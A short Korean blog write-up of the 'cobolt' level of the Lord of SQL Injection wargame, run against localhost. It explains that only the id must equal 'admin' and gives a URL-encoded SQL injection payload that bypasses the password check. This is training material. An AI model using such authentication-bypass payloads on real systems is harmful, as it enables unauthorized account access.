Lord_of_SQL-Injections_I

los - cobolt

초보 & 뉴비 2015. 8. 10. 13:27

 

 

필터링은 무시하고, 클리어 조건을 보면 쿼리에 대한 결과 값 중 id 값이 'admin' 이여야만 한다.

 

다행히 'pw'는 체크하지 않기 때문에 간단하게 클리어 할 수 있다.

 

http://localhost/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=1%27%20or%20%271=1%27%20and%20id=%27admin%27%23

저작자표시 비영리 동일조건 (새창열림)